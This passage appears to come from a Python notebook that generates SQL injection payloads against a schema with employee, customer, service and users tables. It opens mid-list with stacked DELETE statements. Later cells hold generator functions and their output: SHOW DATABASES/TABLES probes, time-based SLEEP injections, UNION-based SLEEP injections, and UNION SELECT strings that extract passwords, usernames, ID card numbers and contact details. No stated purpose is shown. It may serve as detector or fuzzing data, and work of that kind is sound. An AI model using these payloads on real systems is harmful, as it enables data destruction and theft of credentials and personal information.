 '\\"; DELETE FROM service WHERE name = "ZfLHoxWvKFJCZ"#',
 '\\"; DELETE FROM employee WHERE address = "qSApbe"# ',
 '\\"; DELETE FROM service WHERE name = "TGXFiKHLVKLPMl"#',
 '\\"; DELETE FROM users WHERE password = "PL2IOKhWKcN"#',
 '\\"; DELETE FROM employee WHERE nickname = "xvTl"-- ',
 '\\"; DELETE FROM service WHERE price = 041-- ',
 '\\"; DELETE FROM employee WHERE email = "VjmdxP7xkWO"#',
 '\\"; DELETE FROM customer WHERE customer_id = "AutduxdjdB"#',
 '\\"; DELETE FROM employee WHERE employee_id = "Y0waROyBW"#',
 '\\"; DELETE FROM employee WHERE fname = "mjxDRChIljMJlU"-- ',
 '\\"; DELETE FROM customer WHERE fname = "zUGKKZRqctBA"#',
 '\\"; DELETE FROM service WHERE price = 513# ',
 '\\"; DELETE FROM service WHERE name = "fBoAjDoaJiUj"# ',
 '\\"; DELETE FROM customer WHERE fname = "xhSNolDuhXXKd"# ',
 '\\"; DELETE FROM service WHERE price = 997# ',
 '\\"; DELETE FROM users WHERE password = "4JXYgsdm"# ',
 '\\"; DELETE FROM customer WHERE tel = 0364700330#',
 '\\"; DELETE FROM users WHERE username = "WrmvsdoN"# ',
 '\\"; DELETE FROM service WHERE name = "JMCVUDFkfEtz"-- ',
 '\\"; DELETE FROM employee WHERE graduation_certificate = "DXMHULJkvxjeX"-- ',
 '\\"; DELETE FROM employee WHERE prefixname = "sQojAmHyUpxEb"#',
 '\\"; DELETE FROM customer WHERE lname = "GCvSJeqQxQqF"# ',
 '\\"; DELETE FROM customer WHERE lname = "xeGCFGCIXMiba"#',
 '\\"; DELETE FROM employee WHERE fname = "sbDIjO"# ',
 '\\"; DELETE FROM service WHERE price = 314# ',
 '\\"; DELETE FROM customer WHERE customer_id = "Ropb7PM"-- ',
 '\\"; DELETE FROM service WHERE name = "wzqwSkLr"# ',
 '\\"; DELETE FROM service WHERE name = "HycLMsmcZkOquM"#',
 '\\"; DELETE FROM customer WHERE email = "6Njc7ZO5"-- ',
 '\\"; DELETE FROM service WHERE name = "aaRRivgYwNgjX"# ',
 '\\"; DELETE FROM employee WHERE prefixname = "aHxqOiarOKe"-- ',
 '\\"; DELETE FROM service WHERE name = "iNPALPGLXarV"-- ',
 '\\"; DELETE FROM users WHERE password = "kNVBjU5zl0zR"# ',
 '\\"; DELETE FROM service WHERE price = 921-- ',
 '\\"; DELETE FROM service WHERE price = 968-- ',
 '\\"; DELETE FROM service WHERE price = 357# ',
 '\\"; DELETE FROM employee WHERE employee_id = "cnvdk"# ',
 '\\"; DELETE FROM employee WHERE tel = 0538269756# ',
 '\\"; DELETE FROM employee WHERE fname = "zwPVdASkfkZ"# ',
 '\\"; DELETE FROM users WHERE password = "vzFbuD"#',
 '\\"; DELETE FROM customer WHERE customer_id = "KydFD"-- ',
 '\\"; DELETE FROM employee WHERE house_registration = "X7KaLF"# ',
 '\\"; DELETE FROM customer WHERE lname = "sFVxdHjHs"-- ',
 '\\"; DELETE FROM users WHERE password = "W5G8yiBIUP2ZM4X"-- ',
 '\\"; DELETE FROM customer WHERE tel = 0109065008#',
 '\\"; DELETE FROM service WHERE price = 463-- ',
 '\\"; DELETE FROM users WHERE password = "bpFNozc08Ps9cb"-- ',
 '\\"; DELETE FROM employee WHERE employee_id = "nRR1N"# ',
 '\\"; DELETE FROM employee WHERE address = "4dpZH1kKikC"-- ',
 '\\"; DELETE FROM customer WHERE customer_id = "Ex7GabK"-- ',
 '\\"; DELETE FROM users WHERE username = "bGfoEUSKLin"-- ',
 '\\"; DELETE FROM employee WHERE graduation_certificate = "1ARcT"#',
 '\\"; DELETE FROM users WHERE password = "ysIR99WukFHb"# ',
 '\\"; DELETE FROM employee WHERE tel = 0665615833-- ',
 '\\"; DELETE FROM users WHERE username = "nhNfLp"# ',
 '\\"; DELETE FROM users WHERE username = "CBkaDDQwY"-- ',
 '\\"; DELETE FROM employee WHERE prefixname = "SKZmvZZnOErZI"#',
 '\\"; DELETE FROM users WHERE username = "wfoejeUjYOQ"# ',
 '\\"; DELETE FROM customer WHERE email = "vo4j"#',
 '\\"; DELETE FROM employee WHERE house_registration = "m6dwiAE3RWuOkFH"# ',
 '\\"; DELETE FROM employee WHERE lname = "pyzN"#',
 '\\"; DELETE FROM service WHERE price = 681# ',
 '\\"; DELETE FROM customer WHERE tel = 0511285498# ',
 '\\"; DELETE FROM employee WHERE house_registration = "7YRxsyXgV6hk"#',
 '\\"; DELETE FROM service WHERE name = "KyymoCYhebcKxZ"#',
 '\\"; DELETE FROM employee WHERE fname = "IlRgQKl"# ',
 '\\"; DELETE FROM customer WHERE tel = 0391858050# ',
 '\\"; DELETE FROM service WHERE name = "wOGvNlRVFrxJSxT"#',
 '\\"; DELETE FROM users WHERE username = "GJqGB"#',
 '\\"; DELETE FROM service WHERE price = 338#',
 '\\"; DELETE FROM users WHERE password = "LdbOVSHVzKu9"#',
 '\\"; DELETE FROM service WHERE price = 624#',
 '\\"; DELETE FROM users WHERE password = "8qbvEeTbmt"#',
 '\\"; DELETE FROM customer WHERE fname = "wrMjaprneZGPu"# ',
 '\\"; DELETE FROM users WHERE password = "ToOO"-- ',
 '\\"; DELETE FROM employee WHERE lname = "UBHIrTAF"#',
 '\\"; DELETE FROM service WHERE price = 190# ',
 '\\"; DELETE FROM users WHERE username = "jdZdYmOTzqnInI"#',
 '\\"; DELETE FROM customer WHERE fname = "iwIGC"-- ',
 '\\"; DELETE FROM users WHERE password = "27lkljQ29xSL"# ',
 '\\"; DELETE FROM service WHERE name = "IjaVtDS"# ',
 '\\"; DELETE FROM employee WHERE prefixname = "NZeAMXgxWm"#',
 '\\"; DELETE FROM customer WHERE lname = "USByei"-- ',
 '\\"; DELETE FROM users WHERE username = "IdRkhmDsVMEkH"#',
 '\\"; DELETE FROM service WHERE name = "ZStddxO"-- ',
 '\\"; DELETE FROM users WHERE password = "2YxsI4u"#',
 '\\"; DELETE FROM customer WHERE email = "ZXTgh6BGEzB"#',
 '\\"; DELETE FROM customer WHERE tel = 0314290012#',
 '\\"; DELETE FROM employee WHERE nickname = "XnhnhS"#',
 '\\"; DELETE FROM employee WHERE employee_id = "SmP0PW"# ',
 '\\"; DELETE FROM users WHERE password = "Nu1r8nVL5OHZrm"-- ',
 '\\"; DELETE FROM customer WHERE lname = "CtPZQeyI"# ',
 '\\"; DELETE FROM service WHERE name = "wrfPdtVPNpz"# ',
 '\\"; DELETE FROM employee WHERE house_registration = "GmFHBCUNXEbcVw"# ',
 '\\"; DELETE FROM customer WHERE lname = "icBInsFSSeYPoB"# ',
 '\\"; DELETE FROM users WHERE username = "akMZXiSExDzR"# ',
 '\\"; DELETE FROM service WHERE name = "aDnROAEQLez"#',
 '\\"; DELETE FROM customer WHERE fname = "JLUqJGxEANJ"-- ',
 '\\"; DELETE FROM service WHERE name = "ktgEpqj"#',
 '\\"; DELETE FROM employee WHERE graduation_certificate = "Qo59GOWVb0flw3u"#',
 '\\"; DELETE FROM customer WHERE email = "9yVXAkNcD69Iu"#',
 '\\"; DELETE FROM employee WHERE nickname = "FMLNMKb"# ',
 '\\"; DELETE FROM service WHERE name = "YUfa"# ',
 '\\"; DELETE FROM service WHERE name = "mLPYevlzDQHs"#',
 '\\"; DELETE FROM customer WHERE fname = "TWWDxQDRzoVX"-- ',
 '\\"; DELETE FROM users WHERE username = "fUsffuPkF"# ',
 '\\"; DELETE FROM service WHERE price = 623-- ',
 '\\"; DELETE FROM users WHERE username = "iifuBdlDqex"#',
 '\\"; DELETE FROM employee WHERE work_background = "mF53"#',
 '\\"; DELETE FROM customer WHERE fname = "KmROIP"# ',
 '\\"; DELETE FROM service WHERE price = 540-- ',
 '\\"; DELETE FROM service WHERE price = 369#',
 '\\"; DELETE FROM users WHERE username = "FXbCdQmwHpPNHlh"-- ',
 '\\"; DELETE FROM users WHERE password = "5uE16CeAUcugyp"# ',
 '\\"; DELETE FROM customer WHERE email = "P1PuyBOQ"#',
 '\\"; DELETE FROM customer WHERE tel = 0639875707-- ',
 '\\"; DELETE FROM service WHERE price = 449# ',
 '\\"; DELETE FROM users WHERE username = "NBLfdZyjaKIJ"-- ',
 '\\"; DELETE FROM customer WHERE tel = 0134589851# ',
 '\\"; DELETE FROM service WHERE name = "rpkevDBizL"#',
 '\\"; DELETE FROM customer WHERE lname = "AcNjQHFii"-- ',
 '\\"; DELETE FROM service WHERE name = "gWccIdRAs"-- ',
 '\\"; DELETE FROM service WHERE price = 423# ']

In [10]:
def randomShowForSearch(showList, last):
    gen=[]
    for i in range(100) :
        preStr =""
        random_show=showList[random.randint(0, len(showList)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r"\"; " + "SHOW " + random_show + random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [11]:
randomShowForSearch(showList, last)

['\\"; SHOW DATABASES# ',
 '\\"; SHOW DATABASES#',
 '\\"; SHOW TABLES-- ',
 '\\"; SHOW TABLES# ',
 '\\"; SHOW TABLES#',
 '\\"; SHOW COLUME# ',
 '\\"; SHOW COLUME#',
 '\\"; SHOW DATABASES-- ',
 '\\"; SHOW COLUME-- ']

In [12]:
def randomWaitForSearch(showList, last):
    gen=[]
    for i in range(100) :
        preStr =""
        time = random.randint(1, 15)
        preStr += r'\"; ' + "SELECT SLEEP(" + str(time) + ")"
        random_last=last[random.randint(0, len(last)-1)]
        preStr += random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [13]:
randomWaitForSearch(showList, last)

['\\"; SELECT SLEEP(9)# ',
 '\\"; SELECT SLEEP(3)-- ',
 '\\"; SELECT SLEEP(7)# ',
 '\\"; SELECT SLEEP(10)-- ',
 '\\"; SELECT SLEEP(9)#',
 '\\"; SELECT SLEEP(15)# ',
 '\\"; SELECT SLEEP(1)# ',
 '\\"; SELECT SLEEP(14)-- ',
 '\\"; SELECT SLEEP(11)#',
 '\\"; SELECT SLEEP(13)#',
 '\\"; SELECT SLEEP(9)-- ',
 '\\"; SELECT SLEEP(1)-- ',
 '\\"; SELECT SLEEP(12)-- ',
 '\\"; SELECT SLEEP(15)#',
 '\\"; SELECT SLEEP(5)#',
 '\\"; SELECT SLEEP(13)# ',
 '\\"; SELECT SLEEP(8)# ',
 '\\"; SELECT SLEEP(11)-- ',
 '\\"; SELECT SLEEP(4)-- ',
 '\\"; SELECT SLEEP(12)# ',
 '\\"; SELECT SLEEP(8)-- ',
 '\\"; SELECT SLEEP(2)# ',
 '\\"; SELECT SLEEP(14)#',
 '\\"; SELECT SLEEP(5)-- ',
 '\\"; SELECT SLEEP(2)-- ',
 '\\"; SELECT SLEEP(12)#',
 '\\"; SELECT SLEEP(6)# ',
 '\\"; SELECT SLEEP(3)#',
 '\\"; SELECT SLEEP(6)#',
 '\\"; SELECT SLEEP(10)#',
 '\\"; SELECT SLEEP(7)#',
 '\\"; SELECT SLEEP(14)# ',
 '\\"; SELECT SLEEP(4)# ',
 '\\"; SELECT SLEEP(3)# ',
 '\\"; SELECT SLEEP(8)#',
 '\\"; SELECT SLEEP(7)-- ',
 '\\"; SELECT SLEEP(2)#',
 '\\"; SELECT SLEEP(11)# ',
 '\\"; SELECT SLEEP(15)-- ',
 '\\"; SELECT SLEEP(10)# ']

In [14]:
def randomWaitUnionForSearch(showList, last):
    gen=[]
    for i in range(200) :
        preStr =""
        time = random.randint(1, 15)
        preStr += r'\" UNION SELECT SLEEP(' + str(time) + ")"
        numOfParam = random.randint(0, 7)
        for j in range(numOfParam):
            preStr += ',' + str(random.randint(1, 9))
        random_last=last[random.randint(0, len(last)-1)]
        preStr += random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [15]:
randomWaitUnionForSearch(showList, last)

['\\" UNION SELECT SLEEP(1),7-- ',
 '\\" UNION SELECT SLEEP(12)# ',
 '\\" UNION SELECT SLEEP(2),7,1,9,2,4,4,4# ',
 '\\" UNION SELECT SLEEP(14),3,7,4,1,1# ',
 '\\" UNION SELECT SLEEP(6)#',
 '\\" UNION SELECT SLEEP(11),8,6,2,6,9,9#',
 '\\" UNION SELECT SLEEP(8),5,5,3,4,4# ',
 '\\" UNION SELECT SLEEP(11),6,6,5,9#',
 '\\" UNION SELECT SLEEP(1),1,8,3,2,9,6# ',
 '\\" UNION SELECT SLEEP(2),8,8,4,1,9,2#',
 '\\" UNION SELECT SLEEP(2),8,8,7,8-- ',
 '\\" UNION SELECT SLEEP(3),7,1,7,1,9,7,6# ',
 '\\" UNION SELECT SLEEP(4),7,1,2,5,3# ',
 '\\" UNION SELECT SLEEP(6),1,7,3#',
 '\\" UNION SELECT SLEEP(1),6,3,3,9,4,8,9# ',
 '\\" UNION SELECT SLEEP(6),8,3,3-- ',
 '\\" UNION SELECT SLEEP(7),8,4,4,1,4#',
 '\\" UNION SELECT SLEEP(5),4,9,9# ',
 '\\" UNION SELECT SLEEP(15),9,8,1,3,2#',
 '\\" UNION SELECT SLEEP(14),5,1,6,7,3#',
 '\\" UNION SELECT SLEEP(10),1,5,7,6,5-- ',
 '\\" UNION SELECT SLEEP(4),3,3,7,4,1,2# ',
 '\\" UNION SELECT SLEEP(9),9,4,4,2# ',
 '\\" UNION SELECT SLEEP(15),7,4#',
 '\\" UNION SELECT SLEEP(3),4,2,9,4,9,9# ',
 '\\" UNION SELECT SLEEP(6),2-- ',
 '\\" UNION SELECT SLEEP(1),1,7,2-- ',
 '\\" UNION SELECT SLEEP(2),3,6,7,1# ',
 '\\" UNION SELECT SLEEP(12),5,4# ',
 '\\" UNION SELECT SLEEP(12),8,2,5,3# ',
 '\\" UNION SELECT SLEEP(15),4,9,8#',
 '\\" UNION SELECT SLEEP(9),6,7,5,1,6,1,4-- ',
 '\\" UNION SELECT SLEEP(1),1,3,1,7,7-- ',
 '\\" UNION SELECT SLEEP(5)-- ',
 '\\" UNION SELECT SLEEP(12),1,9,2,7#',
 '\\" UNION SELECT SLEEP(6),9,4,5,7,4# ',
 '\\" UNION SELECT SLEEP(14),4,3,8,3# ',
 '\\" UNION SELECT SLEEP(2),6,7,7,8,3# ',
 '\\" UNION SELECT SLEEP(4),1-- ',
 '\\" UNION SELECT SLEEP(10),2,3,3,4,3,1,9# ',
 '\\" UNION SELECT SLEEP(15),2-- ',
 '\\" UNION SELECT SLEEP(10),3# ',
 '\\" UNION SELECT SLEEP(9),6,8,3#',
 '\\" UNION SELECT SLEEP(15),3-- ',
 '\\" UNION SELECT SLEEP(6),3,4,4#',
 '\\" UNION SELECT SLEEP(4),8,1,8,6-- ',
 '\\" UNION SELECT SLEEP(9),4,7# ',
 '\\" UNION SELECT SLEEP(1),9,7,5,1,3,3,6# ',
 '\\" UNION SELECT SLEEP(8),2,2,7,2,9-- ',
 '\\" UNION SELECT SLEEP(11)#',
 '\\" UNION SELECT SLEEP(11),5,3,5,3,4,2,5# ',
 '\\" UNION SELECT SLEEP(4),5,7-- ',
 '\\" UNION SELECT SLEEP(8),8,7,6,9-- ',
 '\\" UNION SELECT SLEEP(3),8,6,8,5,7,2,7-- ',
 '\\" UNION SELECT SLEEP(8),2#',
 '\\" UNION SELECT SLEEP(7),9,8,4,9,7# ',
 '\\" UNION SELECT SLEEP(12),2,8,4,1,1,3#',
 '\\" UNION SELECT SLEEP(12),4# ',
 '\\" UNION SELECT SLEEP(9),7,4# ',
 '\\" UNION SELECT SLEEP(3),3,2,3# ',
 '\\" UNION SELECT SLEEP(12),7,5,4,7,7-- ',
 '\\" UNION SELECT SLEEP(12),5,3,6,4,1,5#',
 '\\" UNION SELECT SLEEP(15),5,7,1# ',
 '\\" UNION SELECT SLEEP(14),5,2,8#',
 '\\" UNION SELECT SLEEP(3)-- ',
 '\\" UNION SELECT SLEEP(11),8,9,9,4,2,7,2-- ',
 '\\" UNION SELECT SLEEP(14)#',
 '\\" UNION SELECT SLEEP(1),8,9,9,5,1,4-- ',
 '\\" UNION SELECT SLEEP(13),2,6,3,9,5,3,1-- ',
 '\\" UNION SELECT SLEEP(15),4#',
 '\\" UNION SELECT SLEEP(14),5,4,1,1,7-- ',
 '\\" UNION SELECT SLEEP(3)#',
 '\\" UNION SELECT SLEEP(5)# ',
 '\\" UNION SELECT SLEEP(1),6#',
 '\\" UNION SELECT SLEEP(6),2,7,4#',
 '\\" UNION SELECT SLEEP(5),8,6,2,7-- ',
 '\\" UNION SELECT SLEEP(1),1,6,5#',
 '\\" UNION SELECT SLEEP(1),2,1,1-- ',
 '\\" UNION SELECT SLEEP(10),5,7,7,4#',
 '\\" UNION SELECT SLEEP(10),7,9,8#',
 '\\" UNION SELECT SLEEP(9),8,8,1,2,2,4-- ',
 '\\" UNION SELECT SLEEP(10),3,6# ',
 '\\" UNION SELECT SLEEP(4),2-- ',
 '\\" UNION SELECT SLEEP(14),9,1,2,5,5,1-- ',
 '\\" UNION SELECT SLEEP(12),5,5,1,1,3,1#',
 '\\" UNION SELECT SLEEP(7)-- ',
 '\\" UNION SELECT SLEEP(11),3,4,6,4#',
 '\\" UNION SELECT SLEEP(6),4,5,6,5,6#',
 '\\" UNION SELECT SLEEP(5),1,3,3,7,2,7# ',
 '\\" UNION SELECT SLEEP(3),5,4,8,3,9,7#',
 '\\" UNION SELECT SLEEP(4),8,3,2-- ',
 '\\" UNION SELECT SLEEP(10),4,2-- ',
 '\\" UNION SELECT SLEEP(8)-- ',
 '\\" UNION SELECT SLEEP(8),8#',
 '\\" UNION SELECT SLEEP(8),9,8,4,5-- ',
 '\\" UNION SELECT SLEEP(4)-- ',
 '\\" UNION SELECT SLEEP(12),8,5,3,1,2,9,1# ',
 '\\" UNION SELECT SLEEP(14),3# ',
 '\\" UNION SELECT SLEEP(11),7-- ',
 '\\" UNION SELECT SLEEP(4)#',
 '\\" UNION SELECT SLEEP(5),4,2#',
 '\\" UNION SELECT SLEEP(6),4,5# ',
 '\\" UNION SELECT SLEEP(4),7,3,3-- ',
 '\\" UNION SELECT SLEEP(4),7#',
 '\\" UNION SELECT SLEEP(9)#',
 '\\" UNION SELECT SLEEP(7),4,6# ',
 '\\" UNION SELECT SLEEP(15)-- ',
 '\\" UNION SELECT SLEEP(4),6,6,3,7,1#',
 '\\" UNION SELECT SLEEP(11),5,4,7,6,3,9# ',
 '\\" UNION SELECT SLEEP(12),7,7,1,3,6-- ',
 '\\" UNION SELECT SLEEP(10),5,2,3,9#',
 '\\" UNION SELECT SLEEP(6),7,3# ',
 '\\" UNION SELECT SLEEP(15),1-- ',
 '\\" UNION SELECT SLEEP(11),4# ',
 '\\" UNION SELECT SLEEP(15),9,8,6,9,9,9-- ',
 '\\" UNION SELECT SLEEP(4),7,4,2#',
 '\\" UNION SELECT SLEEP(15),4,4# ',
 '\\" UNION SELECT SLEEP(15),3,7,3,8-- ',
 '\\" UNION SELECT SLEEP(1),3,4,3,9-- ',
 '\\" UNION SELECT SLEEP(7),8,1,7,2,7,1#',
 '\\" UNION SELECT SLEEP(14),9# ',
 '\\" UNION SELECT SLEEP(1),6,2# ',
 '\\" UNION SELECT SLEEP(2),4,3# ',
 '\\" UNION SELECT SLEEP(11),4,8-- ',
 '\\" UNION SELECT SLEEP(13),5,9,4,4,8-- ',
 '\\" UNION SELECT SLEEP(2),5,5,1,3,7,7#',
 '\\" UNION SELECT SLEEP(4),8,7,6,8,9,1,1#',
 '\\" UNION SELECT SLEEP(1),5,2,4,1,4# ',
 '\\" UNION SELECT SLEEP(6),7-- ',
 '\\" UNION SELECT SLEEP(10),2,6,9,2#',
 '\\" UNION SELECT SLEEP(8),7,4,3,5,2#',
 '\\" UNION SELECT SLEEP(9),4#',
 '\\" UNION SELECT SLEEP(12),8,9,6,4,4,3-- ',
 '\\" UNION SELECT SLEEP(6),8,9,7,1,3# ',
 '\\" UNION SELECT SLEEP(5),6,6,4,3# ',
 '\\" UNION SELECT SLEEP(9),1,4,1# ',
 '\\" UNION SELECT SLEEP(7),6,1,2-- ',
 '\\" UNION SELECT SLEEP(4),5,5,4# ',
 '\\" UNION SELECT SLEEP(13),3,6,8,6# ',
 '\\" UNION SELECT SLEEP(12),2,6,2,4,8,1#',
 '\\" UNION SELECT SLEEP(6),1,1,8,2,6,5#',
 '\\" UNION SELECT SLEEP(9),1,1,7,5,6,8,2#',
 '\\" UNION SELECT SLEEP(9)-- ',
 '\\" UNION SELECT SLEEP(15),7,5,3,6-- ',
 '\\" UNION SELECT SLEEP(12),8#',
 '\\" UNION SELECT SLEEP(1),2,8-- ',
 '\\" UNION SELECT SLEEP(1),8,1,7,8,8#',
 '\\" UNION SELECT SLEEP(14),6,3#',
 '\\" UNION SELECT SLEEP(13),8,8,3# ',
 '\\" UNION SELECT SLEEP(2),8,6,6,9,5,2,6#',
 '\\" UNION SELECT SLEEP(9),9# ',
 '\\" UNION SELECT SLEEP(7),9,6# ',
 '\\" UNION SELECT SLEEP(11),4,4,2,8-- ',
 '\\" UNION SELECT SLEEP(12),3,5,9-- ',
 '\\" UNION SELECT SLEEP(4),7,1,3,2,8,9,1#',
 '\\" UNION SELECT SLEEP(3),1#',
 '\\" UNION SELECT SLEEP(6),1,1,1,3,9,7,3-- ',
 '\\" UNION SELECT SLEEP(14),5,4,5-- ',
 '\\" UNION SELECT SLEEP(8),4,7,9,8,3,3#',
 '\\" UNION SELECT SLEEP(10),3,6,8,2,4,4-- ',
 '\\" UNION SELECT SLEEP(1),8,3,5#',
 '\\" UNION SELECT SLEEP(13),3,9,4,9# ',
 '\\" UNION SELECT SLEEP(1),4,5#',
 '\\" UNION SELECT SLEEP(11),4,6,2,2,3,8,6#',
 '\\" UNION SELECT SLEEP(2),1,7,9,4,9#',
 '\\" UNION SELECT SLEEP(5),7,3,9,6,8,9#',
 '\\" UNION SELECT SLEEP(13),2,5,7,5,8,4#',
 '\\" UNION SELECT SLEEP(8),2,2,2,9# ',
 '\\" UNION SELECT SLEEP(15),7,2,5,6# ',
 '\\" UNION SELECT SLEEP(3),5-- ',
 '\\" UNION SELECT SLEEP(1),3,1,9,9,6#',
 '\\" UNION SELECT SLEEP(1),7,5,7,7#',
 '\\" UNION SELECT SLEEP(15),7,5,6,8,2#',
 '\\" UNION SELECT SLEEP(5),8,4,5,7,3,3,8#',
 '\\" UNION SELECT SLEEP(11),8#',
 '\\" UNION SELECT SLEEP(2),4#',
 '\\" UNION SELECT SLEEP(4),1,8,2,5,5,9,2-- ',
 '\\" UNION SELECT SLEEP(2),3-- ',
 '\\" UNION SELECT SLEEP(11),4,1,2# ',
 '\\" UNION SELECT SLEEP(15)# ',
 '\\" UNION SELECT SLEEP(13),7# ',
 '\\" UNION SELECT SLEEP(8),8,5,6,5#',
 '\\" UNION SELECT SLEEP(3),3,3,9,7-- ',
 '\\" UNION SELECT SLEEP(8),9,3,3,1,5,6,8#',
 '\\" UNION SELECT SLEEP(13),9,9#',
 '\\" UNION SELECT SLEEP(12),6,6,6,6,1,4,8# ',
 '\\" UNION SELECT SLEEP(11),8,2,5,8,4,3,7# ',
 '\\" UNION SELECT SLEEP(3),2,8,4,2,6#',
 '\\" UNION SELECT SLEEP(8),5,9,4,2,3,9,4# ',
 '\\" UNION SELECT SLEEP(13),1-- ',
 '\\" UNION SELECT SLEEP(1),1,9,9,9,4# ',
 '\\" UNION SELECT SLEEP(6),2,5,6,5-- ',
 '\\" UNION SELECT SLEEP(4),3,7,3,2,8,8,9-- ',
 '\\" UNION SELECT SLEEP(13)#']

In [16]:
def randomUnionForUrl(table, table_value, last):
    gen=[]
    for i in range(200) :
        typeOfValue=[]
        preStr =""
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\";'+" UNION SELECT "
        
        numOfParam=random.randint(0, len(table_value[random_table])-1)
        if (numOfParam == 0):
            preStr += "*" + " FROM " + random_table + "" + random_last
        else:
            for j in range(numOfParam) :
                while True:
                    random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                    if random_table_value not in preStr:
                        typeOfValue.append(type_of_value[random_table_value])
                        break
                    continue 
                    
                preStr += random_table_value
                if j != numOfParam-1 :
                    preStr += ", "
            preStr += " FROM " + random_table
            preStr += "" + random_last

            if preStr in gen:
                continue
            else:
                gen.append(preStr)
    return gen

In [17]:
randomUnionForUrl(table, table_value, last)

['\\"; UNION SELECT nickname, tel, address, fname, lname, email, id_card, house_registration, graduation_certificate, work_background FROM employee-- ',
 '\\"; UNION SELECT email, fname, tel, customer_id FROM customer# ',
 '\\"; UNION SELECT lname, tel, fname, customer_id FROM customer-- ',
 '\\"; UNION SELECT fname, email, tel, lname FROM customer-- ',
 '\\"; UNION SELECT price FROM service#',
 '\\"; UNION SELECT fname, tel, graduation_certificate, prefixname, address, email, lname, house_registration, id_card FROM employee-- ',
 '\\"; UNION SELECT prefixname, tel, employee_id FROM employee#',
 '\\"; UNION SELECT customer_id, tel FROM customer-- ',
 '\\"; UNION SELECT fname, lname FROM customer-- ',
 '\\"; UNION SELECT password FROM users#',
 '\\"; UNION SELECT tel FROM customer# ',
 '\\"; UNION SELECT customer_id FROM customer#',
 '\\"; UNION SELECT customer_id, lname, fname, tel FROM customer-- ',
 '\\"; UNION SELECT name FROM service#',
 '\\"; UNION SELECT work_background, prefixname, email, lname, employee_id, id_card, graduation_certificate, nickname, house_registration FROM employee-- ',
 '\\"; UNION SELECT name FROM service-- ',
 '\\"; UNION SELECT email FROM customer#',
 '\\"; UNION SELECT work_background, nickname, graduation_certificate, address, lname, employee_id, tel FROM employee#',
 '\\"; UNION SELECT username FROM users#',
 '\\"; UNION SELECT address, email, fname, work_background, graduation_certificate, employee_id, lname, nickname FROM employee#',
 '\\"; UNION SELECT graduation_certificate, email, tel FROM employee#',
 '\\"; UNION SELECT email, work_background, lname, graduation_certificate, prefixname, address, employee_id, tel FROM employee# ',
 '\\"; UNION SELECT prefixname, email, employee_id, tel FROM employee#',
 '\\"; UNION SELECT lname, customer_id FROM customer-- ',
 '\\"; UNION SELECT fname, lname, customer_id, tel FROM customer-- ',
 '\\"; UNION SELECT fname, house_registration, email, employee_id, graduation_certificate, prefixname, work_background FROM employee# ',
 '\\"; UNION SELECT price FROM service# ',
 '\\"; UNION SELECT password FROM users# ',
 '\\"; UNION SELECT customer_id, email FROM customer#',
 '\\"; UNION SELECT fname, customer_id, tel, lname FROM customer-- ',
 '\\"; UNION SELECT fname, lname, email, tel FROM customer# ',
 '\\"; UNION SELECT price FROM service-- ',
 '\\"; UNION SELECT username FROM users# ',
 '\\"; UNION SELECT password FROM users-- ',
 '\\"; UNION SELECT prefixname, work_background FROM employee#',
 '\\"; UNION SELECT lname, email, tel, customer_id FROM customer# ',
 '\\"; UNION SELECT fname, house_registration, nickname, lname, employee_id, work_background, graduation_certificate, id_card, email, prefixname, tel FROM employee#',
 '\\"; UNION SELECT fname, prefixname, nickname, lname, email, graduation_certificate, work_background, house_registration, employee_id FROM employee#',
 '\\"; UNION SELECT lname, email FROM customer#',
 '\\"; UNION SELECT employee_id, tel, graduation_certificate, email, address, house_registration, work_background FROM employee-- ',
 '\\"; UNION SELECT fname, tel FROM customer#',
 '\\"; UNION SELECT customer_id, email, tel FROM customer-- ',
 '\\"; UNION SELECT lname, email, tel, fname FROM customer# ',
 '\\"; UNION SELECT house_registration, fname, employee_id, prefixname FROM employee# ',
 '\\"; UNION SELECT prefixname, tel FROM employee-- ',
 '\\"; UNION SELECT employee_id, tel, email, fname, graduation_certificate FROM employee# ',
 '\\"; UNION SELECT tel, fname FROM customer#',
 '\\"; UNION SELECT address, prefixname, house_registration, graduation_certificate, id_card, employee_id, nickname, fname, work_background, lname, email FROM employee# ',
 '\\"; UNION SELECT tel, lname, customer_id, fname FROM customer-- ',
 '\\"; UNION SELECT name FROM service# ',
 '\\"; UNION SELECT lname, customer_id, tel, fname FROM customer# ',
 '\\"; UNION SELECT lname FROM customer# ',
 '\\"; UNION SELECT username FROM users-- ',
 '\\"; UNION SELECT email, id_card, lname, prefixname, address, tel, house_registration, fname FROM employee#',
 '\\"; UNION SELECT tel FROM employee# ',
 '\\"; UNION SELECT lname, tel, nickname, employee_id, house_registration, work_background, address FROM employee#',
 '\\"; UNION SELECT customer_id, lname, tel FROM customer-- ',
 '\\"; UNION SELECT email, tel, lname, fname FROM customer# ',
 '\\"; UNION SELECT email, tel FROM customer# ',
 '\\"; UNION SELECT lname, nickname, fname FROM employee#',
 '\\"; UNION SELECT fname, tel, lname FROM customer-- ',
 '\\"; UNION SELECT fname, graduation_certificate, address, lname FROM employee-- ',
 '\\"; UNION SELECT address, nickname, house_registration, graduation_certificate, prefixname, work_background FROM employee# ',
 '\\"; UNION SELECT email, customer_id, lname, tel FROM customer-- ',
 '\\"; UNION SELECT email, tel, id_card, lname, address, prefixname, work_background, graduation_certificate, employee_id, nickname, house_registration FROM employee#',
 '\\"; UNION SELECT id_card, graduation_certificate, address, prefixname, work_background, fname, tel, employee_id, email, house_registration, nickname FROM employee# ',
 '\\"; UNION SELECT prefixname, lname, nickname, work_background, address, id_card, graduation_certificate, email FROM employee# ',
 '\\"; UNION SELECT graduation_certificate, lname, house_registration, nickname, tel, prefixname, email, employee_id, work_background, id_card, address FROM employee-- ',
 '\\"; UNION SELECT work_background FROM employee-- ',
 '\\"; UNION SELECT tel, lname FROM customer-- ',
 '\\"; UNION SELECT email, tel, fname, lname FROM customer-- ',
 '\\"; UNION SELECT house_registration, tel, fname, address, email FROM employee#',
 '\\"; UNION SELECT fname, prefixname, work_background, house_registration, address, tel FROM employee# ',
 '\\"; UNION SELECT nickname, tel FROM employee-- ',
 '\\"; UNION SELECT tel, email, customer_id FROM customer# ',
 '\\"; UNION SELECT tel, lname, customer_id, fname FROM customer# ',
